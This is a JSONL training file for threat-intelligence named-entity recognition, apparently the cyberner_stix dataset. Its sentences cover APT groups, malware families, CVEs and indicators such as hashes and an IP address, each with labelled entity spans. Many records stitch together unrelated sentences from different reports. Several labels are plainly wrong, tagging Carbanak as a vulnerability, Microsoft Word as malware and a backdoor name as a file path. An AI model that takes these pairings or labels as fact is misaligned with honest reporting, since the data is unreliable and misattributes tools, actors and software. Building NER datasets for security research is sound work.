The RAT , however , had a multitude of functionalities (as listed in the table below) such as to download and execute , compress , encrypt , upload , search directories , etc . This script identifies infected hosts by first sending a custom hello packet , immediately followed by an encoded request for host information , and then parsing the response .", "spans": {"MALWARE: RAT": [[189, 192]]}, "info": {"id": "cyberner_stix_train_003829", "source": "cyberner_stix_train"}} {"text": "System owners are also advised to run the YARA tool on any system they suspect to have been targeted by HIDDEN COBRA actors .", "spans": {"TOOL: System": [[0, 6]], "TOOL: YARA": [[42, 46]], "TOOL: system": [[59, 65]], "THREAT_ACTOR: HIDDEN COBRA": [[104, 116]]}, "info": {"id": "cyberner_stix_train_003830", "source": "cyberner_stix_train"}} {"text": "Release_Time : unknown", "spans": {}, "info": {"id": "cyberner_stix_train_003831", "source": "cyberner_stix_train"}} {"text": "This code will then download further payloads through a POST request to various websites .", "spans": {}, "info": {"id": "cyberner_stix_train_003832", "source": "cyberner_stix_train"}} {"text": "We anticipate this malware to continue to evolve with additional new features ; the only question now is when we will see the next wave . While this criminal organization’s activities now center around BEC , and extend to romance scams , credit card fraud , check fraud , fake job listings , credential harvesting , tax schemes , and more , these actors came from much humbler beginnings , starting with basic Craigslist scams in 2008 . 
The DeltaCharlie DDoS bot was originally reported by Novetta in their 2016 Operation Blockbuster Malware Report .", "spans": {"ORGANIZATION: organization’s": [[158, 172]], "ORGANIZATION: Novetta": [[490, 497]]}, "info": {"id": "cyberner_stix_train_003833", "source": "cyberner_stix_train"}} {"text": "HIDDEN COBRA IOCs related to DeltaCharlie are provided within the accompanying .csv and .stix files of this alert .", "spans": {"THREAT_ACTOR: HIDDEN COBRA": [[0, 12]], "TOOL: IOCs": [[13, 17]], "MALWARE: DeltaCharlie": [[29, 41]], "FILEPATH: .csv": [[79, 83]], "FILEPATH: .stix": [[88, 93]]}, "info": {"id": "cyberner_stix_train_003834", "source": "cyberner_stix_train"}} {"text": "With the previous iterations of DealersChoice samples , the Flash object would immediately load and begin malicious tasks .", "spans": {"TOOL: DealersChoice": [[32, 45]], "TOOL: Flash": [[60, 65]]}, "info": {"id": "cyberner_stix_train_003835", "source": "cyberner_stix_train"}} {"text": "A single compromised account could allow TG-4127 to achieve its operational goals .", "spans": {"THREAT_ACTOR: TG-4127": [[41, 48]]}, "info": {"id": "cyberner_stix_train_003837", "source": "cyberner_stix_train"}} {"text": "We first detected members of this family back in March 2018 . In one of these campaigns , Waterbug used a USB stealer that scans removable storage devices to identify and collect files of interest . 
They then use additional social engineering to prompt the target to open a .scr file , display a decoy document to the users , and finally execute the malware on the victim's machine .", "spans": {"THREAT_ACTOR: Waterbug": [[90, 98]], "TOOL: USB stealer": [[106, 117]], "FILEPATH: .scr": [[274, 278]]}, "info": {"id": "cyberner_stix_train_003838", "source": "cyberner_stix_train"}} {"text": "Interestingly , the fact that the attack was blocked didn’t appear to stop the Sofacy team .", "spans": {"THREAT_ACTOR: Sofacy": [[79, 85]]}, "info": {"id": "cyberner_stix_train_003839", "source": "cyberner_stix_train"}} {"text": "Ensure event logging , including applications , events , login activities , and security attributes , is turned on or monitored for identification of security issues .", "spans": {}, "info": {"id": "cyberner_stix_train_003840", "source": "cyberner_stix_train"}} {"text": "Thus respected journalists ( at least by me ) conflate the “ TRITON actor is active at another site ” with “ TRITON malware was identified at another site ” .", "spans": {"MALWARE: TRITON": [[61, 67], [109, 115]]}, "info": {"id": "cyberner_stix_train_003841", "source": "cyberner_stix_train"}} {"text": "Server-side Carrier Checks In the JavaScript bridge API obfuscation example covered above , the server supplied the app with the necessary strings to complete the billing process . NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong . It filters each attempt to open the ZxShell protected driver or the main DLL , returning a reference to the “ netstat.exe ” file . 
Figure 11 : Sandworm TANKTRAP GPO 2", "spans": {"MALWARE: ZxShell": [[404, 411]], "TOOL: DLL": [[441, 444]], "FILEPATH: netstat.exe": [[478, 489]], "MALWARE: Sandworm TANKTRAP GPO": [[511, 532]]}, "info": {"id": "cyberner_stix_train_003842", "source": "cyberner_stix_train"}} {"text": "In this case , “ Agent Smith ” is being used to for financial gain through the use of malicious advertisements . Unit 42 recently published a blog on a newly identified Trojan called Bookworm , which discussed the architecture and capabilities of the malware and alluded to Thailand being the focus of the threat actors' campaigns . An advanced persistent threat group , previously identified by Microsoft and codenamed Neodymium , is closely associated with BlackOasis ’ operations . Sandworm Team has used port 6789 to accept connections on the group 's SSH server.[34 ] Silence has used port 444 when sending data about the system from the client to the server.[35 ] StrongPity has used HTTPS over port 1402 in C2 communication.[36 ] SUGARUSH has used port 4585 for a TCP connection to its C2 .", "spans": {"MALWARE: Agent Smith": [[17, 28]], "ORGANIZATION: Unit 42": [[113, 120]], "TOOL: Bookworm": [[183, 191]], "ORGANIZATION: Microsoft": [[396, 405]], "THREAT_ACTOR: Neodymium": [[420, 429]], "THREAT_ACTOR: BlackOasis": [[459, 469]], "THREAT_ACTOR: Sandworm Team": [[485, 498]], "SYSTEM: SSH server.[34": [[556, 570]], "THREAT_ACTOR: Silence": [[573, 580]], "THREAT_ACTOR: StrongPity": [[670, 680]], "SYSTEM: HTTPS": [[690, 695]], "SYSTEM: C2 communication.[36": [[714, 734]], "MALWARE: SUGARUSH": [[737, 745]], "SYSTEM: a TCP connection to its C2": [[769, 795]]}, "info": {"id": "cyberner_stix_train_003843", "source": "cyberner_stix_train"}} {"text": "Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 
countries . In the past , we have seen the group using open-source password dumpers such as Mimikatz .", "spans": {"VULNERABILITY: Carbanak": [[75, 83]], "THREAT_ACTOR: cyber-criminal gang": [[88, 107]], "ORGANIZATION: financial institutions": [[209, 231]], "MALWARE: open-source password dumpers": [[302, 330]], "MALWARE: Mimikatz": [[339, 347]]}, "info": {"id": "cyberner_stix_train_003844", "source": "cyberner_stix_train"}} {"text": "Nevertheless , resourceful threat actors such as ScarCruft will probably continue to deploy zero-day exploits against their high profile targets . APT5 has targeted or breached organizations across multiple industries , but its focus appears to be on telecommunications and technology companies , especially information about satellite communications .", "spans": {"THREAT_ACTOR: ScarCruft": [[49, 58]], "VULNERABILITY: zero-day exploits": [[92, 109]], "THREAT_ACTOR: APT5": [[147, 151]], "ORGANIZATION: telecommunications": [[251, 269]], "ORGANIZATION: technology companies": [[274, 294]], "ORGANIZATION: satellite communications": [[326, 350]]}, "info": {"id": "cyberner_stix_train_003845", "source": "cyberner_stix_train"}} {"text": "Simple Backdoor Exploit to Hack Android Devices All you need to do to gain root access of an affected Android device is… Send the text \" rootmydevice '' to any undocumented debugging process . BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance . Outlaw : 104.236.192.6 . 
CrowdStrike incident responders found that renamed Plink and AnyDesk executable creation timestamps on affected backend Exchange servers were closely correlated with PowerShell execution events in the Remote PowerShell logs , indicating the threat actor leveraged the newly discovered exploit chain to drop other tooling for persistent access to the affected Exchange servers .", "spans": {"SYSTEM: Android": [[32, 39], [102, 109]], "THREAT_ACTOR: Outlaw": [[312, 318]], "IP_ADDRESS: 104.236.192.6": [[321, 334]], "ORGANIZATION: CrowdStrike incident responders": [[337, 368]], "THREAT_ACTOR: threat actor": [[578, 590]]}, "info": {"id": "cyberner_stix_train_003846", "source": "cyberner_stix_train"}} {"text": "Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download . We also believe that both clusters of activity have links to attacks with likely Indian origins , the CONFUCIUS_A attacks are linked to the use of SNEEPY/BYEBYESHELL and the CONFUCIUS_B have a loose link to Hangover .", "spans": {"VULNERABILITY: CVE-2017-1099": [[71, 84]], "MALWARE: RTF attachments": [[100, 115]], "MALWARE: SNEEPY/BYEBYESHELL": [[274, 292]], "FILEPATH: CONFUCIUS_B": [[301, 312]], "MALWARE: Hangover": [[334, 342]]}, "info": {"id": "cyberner_stix_train_003847", "source": "cyberner_stix_train"}} {"text": "According to the FBI , the SNAKEMACKEREL threat group \"is part of an ongoing campaign of cyber-enabled operations directed at the United States government and its citizens .", "spans": {"ORGANIZATION: FBI": [[17, 20]], "THREAT_ACTOR: SNAKEMACKEREL": [[27, 40]]}, "info": {"id": "cyberner_stix_train_003848", "source": "cyberner_stix_train"}} {"text": "Recently , we discovered a campaign launched at various Ministries of Foreign Affairs around the world .", "spans": {"ORGANIZATION: Ministries of Foreign Affairs": [[56, 85]]}, "info": {"id": "cyberner_stix_train_003849", "source": "cyberner_stix_train"}} {"text": "This quest to 
determine the currently running application is a hallmark of overlay malware , so we thought we ’ d take a closer look at how it ’ s done . Operation Daybreak appears to have been launched by unknown attackers to infect high profile targets through spear-phishing e-mails . Defeating Compiler-Level Obfuscations Used in APT10 Malware . The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": {"THREAT_ACTOR: attackers": [[214, 223]], "THREAT_ACTOR: APT10": [[334, 339]]}, "info": {"id": "cyberner_stix_train_003850", "source": "cyberner_stix_train"}} {"text": "The request codes are actually replies to the C2 action requests , which are actually called \" responses . The LYCEUM threat group targets organizations in sectors of strategic national importance , including oil and gas and possibly telecommunications . Because APT38 is backed by ( and acts on behalf of ) the North Korean regime , we opted to categorize the group as an \" APT \" instead of a \" FIN \" .", "spans": {"THREAT_ACTOR: LYCEUM": [[111, 117]], "ORGANIZATION: strategic national importance": [[167, 196]], "ORGANIZATION: oil and gas": [[209, 220]], "ORGANIZATION: telecommunications": [[234, 252]], "THREAT_ACTOR: APT38": [[263, 268]]}, "info": {"id": "cyberner_stix_train_003851", "source": "cyberner_stix_train"}} {"text": "BRONZE PRESIDENT has demonstrated intent to steal data from organizations using tools such as Cobalt Strike , PlugX , ORat , and RCSession .", "spans": {"THREAT_ACTOR: BRONZE PRESIDENT": [[0, 16]], "TOOL: Cobalt Strike": [[94, 107]], "MALWARE: PlugX": [[110, 115]], "MALWARE: ORat": [[118, 122]], "MALWARE: RCSession": [[129, 138]]}, "info": {"id": "cyberner_stix_train_003852", "source": "cyberner_stix_train"}} {"text": "The binary infection procedure in the Windows system differed from the previous case .", "spans": {"SYSTEM: Windows": [[38, 45]]}, "info": {"id": "cyberner_stix_train_003853", 
"source": "cyberner_stix_train"}} {"text": "Beginning in mid-January 2019 , TA542 distributed millions of Emotet-laden emails in both English and German . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word .", "spans": {"VULNERABILITY: CVE-2012-0158": [[190, 203]], "VULNERABILITY: exploit": [[207, 214]], "FILEPATH: Microsoft Word": [[215, 229]]}, "info": {"id": "cyberner_stix_train_003854", "source": "cyberner_stix_train"}} {"text": "In addition , Kaspersky discovered that the Winnti group uses a popular backdoor known as PlugX which also has Chinese origins . It was reported by Symantec to Microsoft in September 2018 and was patched on March 12 , 2019 . How Buckeye obtained Equation Group tools at least a year prior to the Shadow Brokers leak remains unknown .", "spans": {"ORGANIZATION: Kaspersky": [[14, 23]], "THREAT_ACTOR: Winnti": [[44, 50]], "TOOL: PlugX": [[90, 95]], "ORGANIZATION: Symantec": [[148, 156]], "ORGANIZATION: Microsoft": [[160, 169]], "THREAT_ACTOR: Buckeye": [[229, 236]], "MALWARE: Equation Group tools": [[246, 266]]}, "info": {"id": "cyberner_stix_train_003855", "source": "cyberner_stix_train"}} {"text": "In some instances , APT41 leveraged POISONPLUG as a first-stage backdoor to deploy the HIGHNOON backdoor in the targeted environment . The sctrls backdoor we came across is delivered via RTF files exploiting CVE-2015-1641 .", "spans": {"THREAT_ACTOR: APT41": [[20, 25]], "TOOL: POISONPLUG": [[36, 46]], "TOOL: HIGHNOON": [[87, 95]], "MALWARE: sctrls backdoor": [[139, 154]], "VULNERABILITY: CVE-2015-1641": [[208, 221]]}, "info": {"id": "cyberner_stix_train_003856", "source": "cyberner_stix_train"}} {"text": "Instead , OurMine had managed to alter WikiLeaks 's DNS records ( held by a third-party registrar ) to direct anyone who tried to visit wikileaks.org to visit a different IP address which definitely wasn't under the control of Julian Assange and his cronies . 
He is responsible for developing tools for conducting attacks and is also able to modify complex exploits and third party software .", "spans": {"THREAT_ACTOR: OurMine": [[10, 17]], "ORGANIZATION: WikiLeaks": [[39, 48]]}, "info": {"id": "cyberner_stix_train_003857", "source": "cyberner_stix_train"}} {"text": "Trojan.SH.MALXMR.UWEJP : 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa .", "spans": {"MALWARE: Trojan.SH.MALXMR.UWEJP": [[0, 22]], "FILEPATH: 1800de5f0fb7c5ef3c0d9787260ed61bc324d861bc92d9673d4737d1421972aa": [[25, 89]]}, "info": {"id": "cyberner_stix_train_003858", "source": "cyberner_stix_train"}} {"text": "Facebook phishing One of the interesting features of this spyware is the ability to steal Facebook credentials using a fake login page , similar to phishing . Between June and September 2017 , Bemstour was also used against targets in the Philippines and Vietnam . The group was first seen in June 2016 .", "spans": {"SYSTEM: Facebook": [[0, 8], [90, 98]], "MALWARE: Bemstour": [[193, 201]]}, "info": {"id": "cyberner_stix_train_003859", "source": "cyberner_stix_train"}} {"text": "Some of the group's phishing lures suggest an interest in national security , humanitarian , and law enforcement organizations in the East , South , and Southeast Asia ( see Figure 1 ) .", "spans": {}, "info": {"id": "cyberner_stix_train_003860", "source": "cyberner_stix_train"}} {"text": "These samples would also contain artefacts of functionality from the earliest CosmicDuke samples from 2010 .", "spans": {"MALWARE: CosmicDuke": [[78, 88]]}, "info": {"id": "cyberner_stix_train_003861", "source": "cyberner_stix_train"}} {"text": "The algorithm for generating the lowest-level domain name was hardwired in the Trojan ’ s code . Documents with the Flash exploit managed to evade static defenses and remain undetected as an exploit on VirusTotal . 
The cybercriminal group Lazarus has a history of attacking financial organizations in Asia and Latin America .", "spans": {"MALWARE: Documents": [[97, 106]], "VULNERABILITY: Flash exploit": [[116, 129]], "THREAT_ACTOR: Lazarus": [[239, 246]], "ORGANIZATION: financial organizations": [[274, 297]]}, "info": {"id": "cyberner_stix_train_003862", "source": "cyberner_stix_train"}} {"text": "Cannon logs into the secondary email account via POP3S looking for emails with a subject that matches the unique system identifier .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[31, 36]], "TOOL: emails": [[67, 73]]}, "info": {"id": "cyberner_stix_train_003863", "source": "cyberner_stix_train"}} {"text": "Much of the information being stolen appear to be military-related . These codes are often leveraged in the malware used by coordinated targeted attackers to differentiate victims that were successfully compromised from different target sets . FIN7 operations are linked to numerous intrusion attempts having targeted hundreds of companies since at least as early as 2015 . They used their unauthorized access to obtain digital certificates that were later exploited in malware campaigns targeting other industries and political activists .", "spans": {"THREAT_ACTOR: FIN7": [[244, 248]], "ORGANIZATION: industries": [[504, 514]], "ORGANIZATION: political activists": [[519, 538]]}, "info": {"id": "cyberner_stix_train_003864", "source": "cyberner_stix_train"}} {"text": "Vulnerabilities Reported BLU Products , founded in 2009 , makes lower-end Android-powered smartphones that sell for as little as $ 50 on Amazon . Rapid7 discovered that additional data was placed into the Dropbox accounts under control of the attacker during the compromise and was able to attribute data that was placed into it as being owned by Visma . 
Invader : 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287 .", "spans": {"SYSTEM: Android-powered": [[74, 89]], "ORGANIZATION: Amazon": [[137, 143]], "ORGANIZATION: Rapid7": [[146, 152]], "THREAT_ACTOR: attacker": [[243, 251]], "MALWARE: Invader": [[355, 362]], "FILEPATH: 0df20ccd074b722d5fe1358b329c7bdebcd7e3902a1ca4ca8d5a98cc5ce4c287": [[365, 429]]}, "info": {"id": "cyberner_stix_train_003866", "source": "cyberner_stix_train"}} {"text": "XENOTIME used credential capture and replay to move between networks , Windows commands , standard command-line tools such as PSExec , and proprietary tools for operations on victim hosts . ( Full reports detailing XENOTIME ’s tool techniques , and procedures are available to Dragos WorldView customers . ) Because the TRISIS malware framework was highly tailored , it would have required specific knowledge of the Triconex ’s infrastructure and processes within a specific plant .", "spans": {"THREAT_ACTOR: XENOTIME": [[0, 8], [215, 223]], "SYSTEM: Windows": [[71, 78]], "TOOL: PSExec": [[126, 132]], "ORGANIZATION: Dragos": [[277, 283]], "TOOL: WorldView": [[284, 293]], "MALWARE: TRISIS": [[320, 326]], "TOOL: Triconex": [[416, 424]]}, "info": {"id": "cyberner_stix_train_003867", "source": "cyberner_stix_train"}} {"text": "Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word . 
The authors of that report identify three primary tools used in the campaigns attributed to Hidden Lynx : Trojan.Naid , Backdoor.Moudoor , and Backdoor.Hikit .", "spans": {"VULNERABILITY: CVE-2012-0158": [[79, 92]], "MALWARE: Microsoft Word": [[104, 118]], "MALWARE: Trojan.Naid": [[227, 238]], "FILEPATH: Backdoor.Moudoor": [[241, 257]], "MALWARE: Backdoor.Hikit": [[264, 278]]}, "info": {"id": "cyberner_stix_train_003868", "source": "cyberner_stix_train"}} {"text": "Government agencies and enterprises should look at this threat as an example of the kind of spying that is now possible given how ubiquitous mobile devices are in the workplace . Now GozNym is now targeting 13 banks and subsidiaries in Germany , Limor Kessem , Executive Security Advisor at IBM , said Tuesday . The standard , non-WEBC2 APT1 backdoor typically communicates using the HTTP protocol ( to blend in with legitimate web traffic ) or a custom protocol that the malware authors designed themselves . In addition to stealing digital certificates , the Winnti gang 's campaign appears to be motivated by the desire to manipulate in - game currency , such as \" runes \" or \" gold , \" that can in many cases be converted into real currency .", "spans": {"TOOL: GozNym": [[183, 189]], "ORGANIZATION: banks": [[210, 215]], "ORGANIZATION: subsidiaries": [[220, 232]], "ORGANIZATION: Kessem": [[252, 258]], "ORGANIZATION: Executive Security": [[261, 279]], "ORGANIZATION: IBM": [[291, 294]], "MALWARE: non-WEBC2": [[327, 336]], "THREAT_ACTOR: APT1": [[337, 341]]}, "info": {"id": "cyberner_stix_train_003869", "source": "cyberner_stix_train"}} {"text": "We believe the 2013 , 2015 , and 2016 KeyBoy samples provide evidence of a development effort focused on changing components that would be used by researchers to develop detection signatures . 
The CVE-2012-0773 was originally discovered by VUPEN and has an interesting story .", "spans": {"TOOL: KeyBoy samples": [[38, 52]], "VULNERABILITY: CVE-2012-0773": [[197, 210]]}, "info": {"id": "cyberner_stix_train_003870", "source": "cyberner_stix_train"}} {"text": "On multiple dates in 2017 , TEMP.Veles struggled to execute this utility on multiple victim systems , potentially due to AV detection .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[28, 38]]}, "info": {"id": "cyberner_stix_train_003871", "source": "cyberner_stix_train"}} {"text": "The Trojan uses this counter to activate the bot - if aforementioned step counter hits the pre-configured threshold it considers running on the device to be safe . It can be seen that after the code leakage , the CEO of the HackingTeam organization said that the leaked code is only a small part is based on the facts , which also reflects that the network arms merchants have lowered the threshold of APT attacks to a certain extent , making more uncertainties of cyber attacks . Remexi is a basic back door Trojan that allows attackers to open a remote shell on the computer and execute commands .", "spans": {"THREAT_ACTOR: HackingTeam": [[224, 235]], "MALWARE: Remexi": [[481, 487]], "MALWARE: Trojan": [[509, 515]], "THREAT_ACTOR: attackers": [[528, 537]]}, "info": {"id": "cyberner_stix_train_003872", "source": "cyberner_stix_train"}} {"text": "However , at the time of writing , we were unable to identify relevant conversations about the EventBot malware . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . 
Magic Hound will often find simpler ACTs for effective compromise , such as creative phishing and simple custom malware .", "spans": {"MALWARE: EventBot": [[95, 103]], "MALWARE: MSIL dropper": [[185, 197]], "ORGANIZATION: Proofpoint": [[224, 234]]}, "info": {"id": "cyberner_stix_train_003873", "source": "cyberner_stix_train"}} {"text": "The “ InternetExchange ” export closes the established connection and frees associated handles .", "spans": {}, "info": {"id": "cyberner_stix_train_003874", "source": "cyberner_stix_train"}} {"text": "Conclusion Gooligan has breached over a million Google accounts . BRONZE BUTLER has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . we never get the pointer . Second , as COSMICENERGY was potentially developed as part of a red team , this discovery suggests that the barriers to entry are lowering for offensive OT threat activity since we normally observe these types of capabilities limited to well resourced or state sponsored actors .", "spans": {"MALWARE: Gooligan": [[11, 19]], "ORGANIZATION: Google": [[48, 54]], "THREAT_ACTOR: BRONZE BUTLER": [[66, 79]], "TOOL: Daserf malware": [[162, 176]], "VULNERABILITY: Flash exploits": [[202, 216]], "MALWARE: COSMICENERGY": [[274, 286]]}, "info": {"id": "cyberner_stix_train_003875", "source": "cyberner_stix_train"}} {"text": "The sample we analyzed in October , for example , contains a plugin that is able to spy on internet connections , and can even divert some SSL connections and steal data from encrypted traffic . There is not much public information about the APT campaign called menuPass ( also known as Stone Panda and APT10 ) . After the content of resource 0xC8 is decompressed , another function from the backdoor DLL is used to load the C2 communication module to the memory and call its \" CreateInstance \" export . 
The group , which was primarily motivated by profit , is noted for utilizing self - developed technically - proficient tools for their attacks .", "spans": {"THREAT_ACTOR: menuPass": [[262, 270]], "THREAT_ACTOR: Stone Panda": [[287, 298]], "THREAT_ACTOR: APT10": [[303, 308]], "TOOL: DLL": [[401, 404]], "TOOL: C2": [[425, 427]], "TOOL: CreateInstance": [[478, 492]]}, "info": {"id": "cyberner_stix_train_003877", "source": "cyberner_stix_train"}} {"text": "Associated indicators and screenshots of the decoy documents are all available here in the ThreatConnect platform .", "spans": {"ORGANIZATION: ThreatConnect": [[91, 104]]}, "info": {"id": "cyberner_stix_train_003879", "source": "cyberner_stix_train"}} {"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments , militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government . Symantec during 2012 linked the Elderwood Project to Operation Aurora ; Trojan.Naid and Backdoor.Moudoor were also used in Aurora , by the Elderwood Gang , and by Hidden Lynx .", "spans": {"ORGANIZATION: governments": [[137, 148]], "ORGANIZATION: militaries": [[151, 161]], "ORGANIZATION: defense attaches": [[164, 180]], "ORGANIZATION: media entities": [[183, 197]], "ORGANIZATION: dissidents": [[204, 214]], "ORGANIZATION: figures": [[219, 226]], "ORGANIZATION: Symantec": [[271, 279]], "MALWARE: Trojan.Naid": [[343, 354]], "FILEPATH: Backdoor.Moudoor": [[359, 375]], "MALWARE: Aurora": [[394, 400]], "THREAT_ACTOR: Elderwood Gang": [[410, 424]], "THREAT_ACTOR: Hidden Lynx": [[434, 445]]}, "info": {"id": "cyberner_stix_train_003880", "source": "cyberner_stix_train"}} {"text": "The source process writes the native shellcode into the memory region allocated by mmap . 
Since March 2015 , ESET has detected Potao binaries at several high-value Ukrainian targets that include government and military entities and one of the major Ukrainian news agencies . APT17 : 0370002227619c205402c48bde4332f6 . It consists of two frames , one for loading the decoy web page from a legitimate website ( copied from http://www.albannagroup.com/business-principles.html ) , and another for performing malicious activities ( hxxp://[c2_hostname]/groups / sidebar.html )", "spans": {"ORGANIZATION: ESET": [[109, 113]], "TOOL: Potao": [[127, 132]], "ORGANIZATION: government": [[195, 205]], "ORGANIZATION: military entities": [[210, 227]], "ORGANIZATION: news agencies": [[259, 272]], "THREAT_ACTOR: APT17": [[275, 280]], "FILEPATH: 0370002227619c205402c48bde4332f6": [[283, 315]]}, "info": {"id": "cyberner_stix_train_003881", "source": "cyberner_stix_train"}} {"text": "Living Off the Land .", "spans": {}, "info": {"id": "cyberner_stix_train_003882", "source": "cyberner_stix_train"}} {"text": "The malicious documents seen in recent activity refer to a number of topics , including recent military promotions within the Pakistan Army , information related to the Pakistan Atomic Energy Commission , as well as Pakistan 's Ministry of the Interior . This sample was also found to be deployed using the CVE-2012-0158 vulnerability .", "spans": {"MALWARE: malicious documents": [[4, 23]], "ORGANIZATION: Pakistan Army": [[126, 139]], "VULNERABILITY: CVE-2012-0158": [[307, 320]]}, "info": {"id": "cyberner_stix_train_003883", "source": "cyberner_stix_train"}} {"text": "- There were two interesting sub-classes found inside Main Activity : Receiver and Sender . According to local media reports , in 2019 Silence successfully withdrew money from the Bangladeshi bank twice within 2 months . 
The organised crime group started its high-tech criminal activities in late 2013 by launching the Anunak malware campaign that targeted financial transfers and ATM networks of financial institutions around the world .", "spans": {"THREAT_ACTOR: Silence": [[135, 142]], "ORGANIZATION: bank": [[192, 196]], "ORGANIZATION: financial institutions": [[397, 419]]}, "info": {"id": "cyberner_stix_train_003884", "source": "cyberner_stix_train"}} {"text": "An expected break following the 2016-2017 winter holidays turned into an unexplained three-month hiatus for TA505 .", "spans": {"THREAT_ACTOR: TA505": [[108, 113]]}, "info": {"id": "cyberner_stix_train_003885", "source": "cyberner_stix_train"}} {"text": "Permissions in the manifest This malware is designed to avoid detection and analysis . This operation has targeted managed IT service providers , the compromise of which provides APT10 with potential access to thousands of further victims . Although precise attribution is not available at the moment , certain evidence we have collected allows us to link this attack to the ShadowPad incident from 2017 . Most fraudsters create one - time email addresses or use stolen email addresses , both of which are easy to create or obtain .", "spans": {"ORGANIZATION: managed IT service providers": [[115, 143]], "THREAT_ACTOR: APT10": [[179, 184]], "THREAT_ACTOR: fraudsters": [[411, 421]]}, "info": {"id": "cyberner_stix_train_003886", "source": "cyberner_stix_train"}} {"text": "These are adapted to the information the malicious operator wants to retrieve . We attribute this activity to TEMP.Zagros ( reported by Palo Alto Networks and Trend Micro as MuddyWater ) , an Iran-nexus actor that has been active since at least May 2017 . Sample ( SHA256 : bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659 ) has the same export entry name and is also a reverse shell . 
An adversary may also destroy data backups that are vital to recovery after an incident .", "spans": {"THREAT_ACTOR: TEMP.Zagros": [[110, 121]], "ORGANIZATION: Palo Alto Networks": [[136, 154]], "ORGANIZATION: Trend Micro": [[159, 170]], "THREAT_ACTOR: MuddyWater": [[174, 184]], "THREAT_ACTOR: actor": [[203, 208]], "FILEPATH: bc1c3e754be9f2175b718aba62174a550cdc3d98ab9c36671a58073140381659": [[274, 338]], "TOOL: reverse shell": [[386, 399]], "ORGANIZATION: adversary": [[405, 414]]}, "info": {"id": "cyberner_stix_train_003887", "source": "cyberner_stix_train"}} {"text": "It will also take a photo using the device ’ s front camera when the user wakes the device . The ScarCruft group keeps expanding its exfiltration targets to steal further information from infected hosts and continues to create tools for additional data exfiltration . The second module is used by the operators to execute an obfuscated PowerShell script , which contains a Meterpreter downloader widely known as “ Tinymet “ . 
For the actors and groups who originally created the malware , it is a more reliable income stream for them .", "spans": {"THREAT_ACTOR: ScarCruft": [[97, 106]], "TOOL: PowerShell": [[336, 346]], "TOOL: Meterpreter": [[373, 384]], "TOOL: downloader": [[385, 395]], "TOOL: Tinymet": [[414, 421]], "THREAT_ACTOR: actors": [[434, 440]]}, "info": {"id": "cyberner_stix_train_003888", "source": "cyberner_stix_train"}} {"text": "This joint Technical Alert ( TA ) is the result of analytic efforts between the Department of Homeland Security ( DHS ) and the Federal Bureau of Investigation ( FBI ) .", "spans": {"ORGANIZATION: Department of Homeland Security": [[80, 111]], "ORGANIZATION: DHS": [[114, 117]], "ORGANIZATION: Federal Bureau of Investigation": [[128, 159]], "ORGANIZATION: FBI": [[162, 165]]}, "info": {"id": "cyberner_stix_train_003889", "source": "cyberner_stix_train"}} {"text": "We have only seen CVE-2015-1701 in use in conjunction with the Adobe Flash exploit for CVE-2015-3043 .", "spans": {"VULNERABILITY: CVE-2015-1701": [[18, 31]], "TOOL: Adobe Flash": [[63, 74]], "VULNERABILITY: CVE-2015-3043": [[87, 100]]}, "info": {"id": "cyberner_stix_train_003890", "source": "cyberner_stix_train"}} {"text": "Once started , it downloads additional malware from the C2 and also uploads some basic system information , stealing , among other things , the user 's Google Chrome credentials . 
These samples were contained in exploit documents containing distinct lure content , one having a Tibetan nexus , the other an Indian nexus .", "spans": {"VULNERABILITY: exploit": [[212, 219]]}, "info": {"id": "cyberner_stix_train_003891", "source": "cyberner_stix_train"}} {"text": "Attackers can now communicate with the compromised machine and remotely execute commands on it .", "spans": {}, "info": {"id": "cyberner_stix_train_003892", "source": "cyberner_stix_train"}} {"text": "The reply , if its length is not equal to six and its contents do not contain “ OK ” is returned back to the caller .", "spans": {}, "info": {"id": "cyberner_stix_train_003893", "source": "cyberner_stix_train"}} {"text": "360 Helios Team captured the first Trojan of the Poison Ivy Group in December 2007 . In the last few weeks , FormBook was seen downloading other malware families such as NanoCore .", "spans": {"ORGANIZATION: 360 Helios Team": [[0, 15]], "TOOL: Poison Ivy": [[49, 59]], "FILEPATH: FormBook": [[109, 117]], "FILEPATH: NanoCore": [[170, 178]]}, "info": {"id": "cyberner_stix_train_003894", "source": "cyberner_stix_train"}} {"text": "During this time , “ Agent Smith ” hackers eventually built up a vast number of app presence on 9Apps , which later would serve as publication channels for evolved droppers . The group still uses the Badnews malware , a backdoor with information-stealing and file-executing capabilities , albeit updated with a slight modification in the encryption routine at the end of 2017 , when they added Blowfish encryption on top of their custom encryption described in our former Patchwork blogpost . For Dexphot , machine learning-based detections in the cloud recognize and block the DLLs loaded by rundll32.exe , stopping the attack chain in its early stages . 
